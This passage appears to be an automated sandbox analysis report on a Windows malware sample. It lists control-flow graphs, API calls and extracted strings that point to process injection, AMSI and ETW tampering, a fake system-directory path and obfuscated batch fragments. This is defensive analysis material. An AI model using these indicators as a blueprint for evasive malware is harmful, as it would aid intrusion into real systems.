                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Library$AddressFreeLoadModuleProc$AttributesCloseCreateHandleMove$CheckDebuggerDeleteDirectoryInetInformationInitNameOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                                                                                                                                              • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                                                                                                                                              • API String ID: 3130226682-181751239
                                                                                                                                              • Opcode ID: 166f56339a35fd0609cdea8f381d47eeb9f102f77784134bac90c089190408ec
                                                                                                                                              • Instruction ID: f73e130893d5b4513abc85ff137bef6d50b75be5abd5aa8cc5c7d49906c6db8e
                                                                                                                                              • Opcode Fuzzy Hash: 166f56339a35fd0609cdea8f381d47eeb9f102f77784134bac90c089190408ec
                                                                                                                                              • Instruction Fuzzy Hash: 2C241E76A501198BDF12EB74CCA4ADD77BABF89310F6140EDE009A7254DB30EE868F51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 5348 27e7878-27e7c67 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c4898 5463 27e7c6d-27e7e40 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c4798 call 27c494c call 27c4d20 call 27c4d9c CreateProcessAsUserW 5348->5463 5464 27e8af1-27e8c74 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c4898 5348->5464 5573 27e7ebe-27e7fc9 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 5463->5573 5574 27e7e42-27e7eb9 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 5463->5574 5553 27e8c7a-27e8c89 call 27c4898 5464->5553 5554 27e9420-27eaa25 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 * 16 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27c46a4 * 2 call 27d8824 call 27d7b98 call 27d818c call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 ExitProcess 5464->5554 5553->5554 5563 27e8c8f-27e8f62 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27de540 call 27c480c call 27c494c call 27c46a4 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c7e18 5553->5563 5821 27e921a-27e941b call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c49a4 call 27d8bb0 5563->5821 5822 27e8f68-27e9215 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c4d8c * 2 call 27c4734 call 27ddacc 5563->5822 5674 27e7fcb-27e7fce 5573->5674 5675 27e7fd0-27e82f0 call 27c49a4 call 27ddc90 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27dcfa4 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 5573->5675 5574->5573 5674->5675 5991 27e8309-27e8aec call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 ResumeThread call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 CloseHandle call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27d7ed4 call 27d87a0 * 6 CloseHandle call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 call 27c480c call 27c494c call 27c46a4 call 27c4798 call 27c494c call 27c46a4 call 27d8824 5675->5991 5992 27e82f2-27e8304 call 27d8584 5675->5992 5821->5554 5822->5821 5991->5464 5992->5991
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027D8824: LoadLibraryA.KERNEL32(00000000,00000000,027D890B), ref: 027D8858
                                                                                                                                                • Part of subcall function 027D8824: FreeLibrary.KERNEL32(74AD0000,00000000,02821388,Function_000065D8,00000004,02821398,02821388,05F5E0FF,00000040,0282139C,74AD0000,00000000,00000000,00000000,00000000,027D890B), ref: 027D88EB
                                                                                                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029157DC,02915820,OpenSession,0282137C,027EAFD8,UacScan,0282137C), ref: 027E7E39
                                                                                                                                              • ResumeThread.KERNEL32(00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8), ref: 027E8483
                                                                                                                                              • CloseHandle.KERNEL32(00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,00000000,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C), ref: 027E8602
                                                                                                                                                • Part of subcall function 027D87A0: LoadLibraryW.KERNEL32(bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize,028213A4,027DA77C,UacScan), ref: 027D87B4
                                                                                                                                                • Part of subcall function 027D87A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027D87CE
                                                                                                                                                • Part of subcall function 027D87A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000614,00000000,028213A4,027DA3C7,ScanString,028213A4,027DA77C,ScanBuffer,028213A4,027DA77C,Initialize), ref: 027D880A
                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,0282137C,027EAFD8,UacInitialize,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,UacScan,0282137C), ref: 027E89F4
                                                                                                                                                • Part of subcall function 027C7E18: GetFileAttributesA.KERNEL32(00000000,?,027DF8CC,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,UacInitialize), ref: 027C7E23
                                                                                                                                                • Part of subcall function 027DDACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,027DDB9E), ref: 027DDB0B
                                                                                                                                                • Part of subcall function 027DDACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 027DDB45
                                                                                                                                                • Part of subcall function 027DDACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 027DDB72
                                                                                                                                                • Part of subcall function 027DDACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 027DDB7B
                                                                                                                                                • Part of subcall function 027D818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,027D8216), ref: 027D81F8
                                                                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,Initialize,0282137C,027EAFD8,00000000,00000000,00000000,ScanString,0282137C,027EAFD8), ref: 027EAA25
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$CloseFile$CreateFreeHandleLoadProcess$AddressAttributesCacheExitFlushInstructionProcResumeThreadUserWrite
                                                                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                                              • API String ID: 1548959583-1225450241
                                                                                                                                              • Opcode ID: 30c447313c56baebec3cfa08642e65c50d2004f50ce21a4bd2f831177314cb1b
                                                                                                                                              • Instruction ID: 0d7c28c7c9e8c7fa72ffdf0260eaedd7f6e50c1127c1f5bbfa194d485405a716
                                                                                                                                              • Opcode Fuzzy Hash: 30c447313c56baebec3cfa08642e65c50d2004f50ce21a4bd2f831177314cb1b
                                                                                                                                              • Instruction Fuzzy Hash: 7D430C76A501198BDF12EB74CDA49DD77FABF89300F6140E9E00AA7254DB30EE868F51

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 8535 27c1724-27c1736 8536 27c173c-27c174c 8535->8536 8537 27c1968-27c196d 8535->8537 8540 27c174e-27c175b 8536->8540 8541 27c17a4-27c17ad 8536->8541 8538 27c1a80-27c1a83 8537->8538 8539 27c1973-27c1984 8537->8539 8547 27c1a89-27c1a8b 8538->8547 8548 27c1684-27c16ad VirtualAlloc 8538->8548 8544 27c1938-27c1945 8539->8544 8545 27c1986-27c19a2 8539->8545 8542 27c175d-27c176a 8540->8542 8543 27c1774-27c1780 8540->8543 8541->8540 8546 27c17af-27c17bb 8541->8546 8549 27c176c-27c1770 8542->8549 8550 27c1794-27c17a1 8542->8550 8552 27c17f0-27c17f9 8543->8552 8553 27c1782-27c1790 8543->8553 8544->8545 8551 27c1947-27c195b Sleep 8544->8551 8554 27c19a4-27c19ac 8545->8554 8555 27c19b0-27c19bf 8545->8555 8546->8540 8556 27c17bd-27c17c9 8546->8556 8557 27c16df-27c16e5 8548->8557 8558 27c16af-27c16dc call 27c1644 8548->8558 8551->8545 8559 27c195d-27c1964 Sleep 8551->8559 8565 27c182c-27c1836 8552->8565 8566 27c17fb-27c1808 8552->8566 8560 27c1a0c-27c1a22 8554->8560 8561 27c19d8-27c19e0 8555->8561 8562 27c19c1-27c19d5 8555->8562 8556->8540 8563 27c17cb-27c17de Sleep 8556->8563 8558->8557 8559->8544 8572 27c1a3b-27c1a47 8560->8572 8573 27c1a24-27c1a32 8560->8573 8568 27c19fc-27c19fe call 27c15cc 8561->8568 8569 27c19e2-27c19fa 8561->8569 8562->8560 8563->8540 8567 27c17e4-27c17eb Sleep 8563->8567 8574 27c18a8-27c18b4 8565->8574 8575 27c1838-27c1863 8565->8575 8566->8565 8571 27c180a-27c181e Sleep 8566->8571 8567->8541 8583 27c1a03-27c1a0b 8568->8583 8569->8583 8571->8565 8585 27c1820-27c1827 Sleep 8571->8585 8579 27c1a68 8572->8579 8580 27c1a49-27c1a5c 8572->8580 8573->8572 8576 27c1a34 8573->8576 8581 27c18dc-27c18eb call 27c15cc 8574->8581 8582 27c18b6-27c18c8 8574->8582 8577 27c187c-27c188a 8575->8577 8578 27c1865-27c1873 8575->8578 8576->8572 8587 27c188c-27c18a6 call 27c1500 8577->8587 8588 27c18f8 8577->8588 8578->8577 8586 27c1875 8578->8586 8589 27c1a6d-27c1a7f 8579->8589 8580->8589 8590 27c1a5e-27c1a63 call 27c1500 8580->8590 8596 27c18fd-27c1936 8581->8596 8600 27c18ed-27c18f7 8581->8600 8591 27c18cc-27c18da 8582->8591 8592 27c18ca 8582->8592 8585->8566 8586->8577 8587->8596 8588->8596 8590->8589 8591->8596 8592->8591
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000,?,027C2000), ref: 027C17D0
                                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,027C2000), ref: 027C17E6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID: 0`
                                                                                                                                              • API String ID: 3472027048-3339448193
                                                                                                                                              • Opcode ID: 265fb047e3a635c8c63cd95dc9ee959b6060f80b53cc8354afbb0dadca21092d
                                                                                                                                              • Instruction ID: f3ef9a80b48ae8a3dfda8eed8d1547b5e3589caa5d9a2b39191baa1cfaa3c540
                                                                                                                                              • Opcode Fuzzy Hash: 265fb047e3a635c8c63cd95dc9ee959b6060f80b53cc8354afbb0dadca21092d
                                                                                                                                              • Instruction Fuzzy Hash: D7B1027AA043518BEB15CF38D484356BBE5EB85320F688ABDD94D8B3C6D770E461CB90

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 10477 27c1a8c-27c1a9b 10478 27c1b6c-27c1b6f 10477->10478 10479 27c1aa1-27c1aa5 10477->10479 10480 27c1c5c-27c1c60 10478->10480 10481 27c1b75-27c1b7f 10478->10481 10482 27c1b08-27c1b11 10479->10482 10483 27c1aa7-27c1aae 10479->10483 10489 27c16e8-27c170b call 27c1644 VirtualFree 10480->10489 10490 27c1c66-27c1c6b 10480->10490 10485 27c1b3c-27c1b49 10481->10485 10486 27c1b81-27c1b8d 10481->10486 10482->10483 10484 27c1b13-27c1b27 Sleep 10482->10484 10487 27c1adc-27c1ade 10483->10487 10488 27c1ab0-27c1abb 10483->10488 10484->10483 10492 27c1b2d-27c1b38 Sleep 10484->10492 10485->10486 10493 27c1b4b-27c1b5f Sleep 10485->10493 10494 27c1b8f-27c1b92 10486->10494 10495 27c1bc4-27c1bd2 10486->10495 10498 27c1ae0-27c1af1 10487->10498 10499 27c1af3 10487->10499 10496 27c1abd-27c1ac2 10488->10496 10497 27c1ac4-27c1ad9 10488->10497 10506 27c170d-27c1714 10489->10506 10507 27c1716 10489->10507 10492->10482 10493->10486 10504 27c1b61-27c1b68 Sleep 10493->10504 10502 27c1b96-27c1b9a 10494->10502 10501 27c1bd4-27c1bd9 call 27c14c0 10495->10501 10495->10502 10498->10499 10500 27c1af6-27c1b03 10498->10500 10499->10500 10500->10481 10501->10502 10508 27c1bdc-27c1be9 10502->10508 10509 27c1b9c-27c1ba2 10502->10509 10504->10485 10511 27c1719-27c1723 10506->10511 10507->10511 10508->10509 10512 27c1beb-27c1bf2 call 27c14c0 10508->10512 10513 27c1bf4-27c1bfe 10509->10513 10514 27c1ba4-27c1bc2 call 27c1500 10509->10514 10512->10509 10516 27c1c2c-27c1c59 call 27c1560 10513->10516 10517 27c1c00-27c1c28 VirtualFree 10513->10517
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,027C1FE4), ref: 027C1B17
                                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,027C1FE4), ref: 027C1B31
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID: 0`
                                                                                                                                              • API String ID: 3472027048-3339448193
                                                                                                                                              • Opcode ID: 730f6591b619deeed75d7d1935b4e7c333617a599ff3fceec19ba65b726c0d34
                                                                                                                                              • Instruction ID: 036c8875ecd74782b26f2b1733f653a2fe23e23115335f15cabc46f21662696e
